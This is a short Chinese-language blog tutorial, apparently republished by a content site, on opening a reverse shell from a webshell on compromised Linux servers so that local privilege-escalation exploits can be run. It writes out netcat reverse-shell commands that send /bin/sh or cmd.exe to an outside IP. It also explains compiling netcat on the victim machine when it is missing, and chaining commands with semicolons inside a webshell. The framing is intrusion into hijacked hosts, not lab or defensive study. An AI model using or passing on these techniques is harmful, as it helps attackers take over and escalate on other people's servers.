共計 1493 個字符,預計需要花費 4 分鐘才能閱讀完成。
這篇文章主要為大家展示了“Linux 下反彈 CmdLine Shell 小技巧有哪些”,內容簡而易懂,條理清晰,希望能夠幫助大家解決疑惑,下面讓丸趣 TV 小編帶領大家一起研究并學習一下“Linux 下反彈 CmdLine Shell 小技巧有哪些”這篇文章吧。
Linux 提權絕大部分都靠的是 Local Exploit。WebShell 一般都可以執行命令,但是我們的 EXP 必須在可交互環境運行,否則如果直接在 WebShell 執行,即使能提權成功,我們也沒法利用到。所以我們需要先反彈一個 CmdLine Shell 回來 (直接說成 CmdShell 怕人誤解 … 因為 Win 有個 cmd.exe ^_^),然后在命令行終端下執行 EXP 進行提權。
一般情況下,絕大多數人都會通過 PHP WebShell 的 Back Connect 功能彈回一個 Shell,但是有時候會碰到服務器不支持 PHP 或者 WebShell 沒法反彈的情況,比如這兩天朋友給我的一個 JSPShell 所在服務器只支持 JSP,不支持 PHP。這時候,我們經典的 netcat 就可以派上用場了。
平時在 Windows 下做事的時候,在必要的情況下我們可以先在本機運行 nc -vv -lp 1234 監聽端口,然后在肉雞上 nc 12.21.12.21 1234 -e cmd.exe 給我們反彈一個 CmdShell,這個方法在 Linux 仍然可行。
在本機監聽后,在 WebShell 運行 nc 12.21.12.21 1234 -e /bin/sh 就能彈一個 CmdLine Shell 給我們。
但我們經常碰到的情況并不都是這么 100% 順利的,像昨晚整的那兩臺,每臺都是不能直接執行 nc 的。一臺有 nc,但執行從是不起作用,另外一臺直接壓根就沒有 nc….
不過,這個難不倒我們,我們可以給他裝一個嘛,比較快捷的方法是,我們可以到 http://netcat.sourceforge.net/download.php 下載 nc 的源碼,先在我們自己 linux 機器上編譯好以后把 bin 文件傳上去 (我開始傳的我的 Debian 自帶的 netcat,結果仍然不能運行 ….)。如果還不行,那就把源碼傳上去,在目標機器上直接編譯。
昨晚那兩臺機器,一臺我是直接傳的本地編譯后的,一臺是在目標機器上編譯的。如果直接傳的 nc 可以運行的話還比較好說,如果需要在目標機器上編譯的話,這里有點小技巧:
因為在得到 CmdLine Shell 前,我們只能在 WebShell 里執行命令,一般每次只能執行一條,然后等回顯。假如我們的 WebShell 在 /var/www/site 目錄,那么我們每次執行命令默認的當前路徑都是 /var/www/site,而我們的 netcat 源碼包解壓在了 /tmp/netcatsrc 文件夾,這樣的話,我們編譯 netcat 的時候,configure 還好說,可用 /tmp/netcatsrc/configure 命令,但下一步 make 的時候就不行了,因為當前路徑是 /var/www/site,而不是我們想要的 /tmp/netcatsrc/,所以我們 configure 完了 make 的時候會報錯。
解決這個問題其實也很簡單,可以直接把兩句寫成一句就可以:cd /tmp/netcatsrc;make
用分號隔開寫,把 make 跟在目錄切換命令后面,這樣編譯的時候就不會報錯了。
在還沒有得到 CmdLine Shell 的時候,這樣的寫法還是很有用的。
以上是“Linux 下反彈 CmdLine Shell 小技巧有哪些”這篇文章的所有內容,感謝各位的閱讀!相信大家都有了一定的了解,希望分享的內容對大家有所幫助,如果還想學習更多知識,歡迎關注丸趣 TV 行業資訊頻道!